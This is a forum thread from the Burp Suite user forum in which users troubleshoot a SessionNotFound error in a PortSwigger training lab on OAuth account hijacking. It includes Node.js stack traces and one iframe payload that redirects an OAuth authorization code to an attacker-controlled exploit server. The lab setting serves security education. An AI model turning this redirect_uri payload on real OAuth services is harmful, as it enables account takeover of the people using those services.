The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: OAuth account hijacking via redirect_uri: SessionNotFound

Antonin | Last updated: Jul 23, 2024 04:07AM UTC

Hi, In the lab titled "Lab: OAuth account hijacking via redirect_uri", I am unable to view the exploit when using the iframe payload on the exploit server. Instead, I get the error below inside the iframe: ```bash OAuth account hijacking via redirect_uri Back to lab description SessionNotFound: invalid_request at Provider.getInteraction (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:50:11) at Provider.interactionDetails (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:228:27) at /home/carlos/oauth/index.js:160:34 at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at setNoCache (/home/carlos/oauth/index.js:121:5) at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at Route.dispatch (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:112:3) at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) ``` I tried yesterday, and today again. The lab had time to reset in-between. Yet, the error is the same. I am following the instructions in the solution religiously. What am I doing wrong?

Ben, PortSwigger Agent | Last updated: Jul 23, 2024 08:40AM UTC

Hi Antonin, Just to clarify, which browser are you using when you attempt this lab?

Antonin | Last updated: Jul 25, 2024 07:40AM UTC

Hi Ben, I am using the native Chromium browser packed with Burp, always.

Antonin | Last updated: Jul 25, 2024 07:56AM UTC

Below is the payload for /exploit: ```html <iframe src="https://oauth-0a1300f604b...028f00b9.oauth-server.net/auth?client_id=kfnckzp146a10r6ofmdvj&redirect_uri=https://exploit-0a7a00c4...f64ca01e700ba.exploit-server.net/exploit&response_type=code&scope=openid%20profile%20email"></iframe> ``` Below is a screenshot of the iframe: https://snipboard.io/wDePNO.jpg

Ben, PortSwigger Agent | Last updated: Jul 25, 2024 08:06AM UTC

Hi Antonin, If you use a standard version of Chrome, do you still see this behaviour?

Jack | Last updated: Jul 27, 2024 09:48PM UTC

same error with chrome, opera, burp browser and firefox, newest version everywhere. Can you please go deeper and try to fix the issue even without replicating? I am afraid that if you wait for you to be able to replicate it will never be fixed because usually u cant replicate :( But some steps could be made to prevent this even if you cant replicate please.

Jack | Last updated: Jul 27, 2024 09:49PM UTC

SessionNotFound: invalid_request at Provider.getInteraction (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:50:11) at Provider.interactionDetails (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:228:27) at /home/carlos/oauth/index.js:160:34 at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at setNoCache (/home/carlos/oauth/index.js:121:5) at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at Route.dispatch (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:112:3) at Layer.handle [as handle_request]

Jack | Last updated: Jul 27, 2024 09:52PM UTC

eventually I quitted burp browser and opened the exploit server again and delivered and worked. very strange bug

2lfa | Last updated: Jul 28, 2024 12:06PM UTC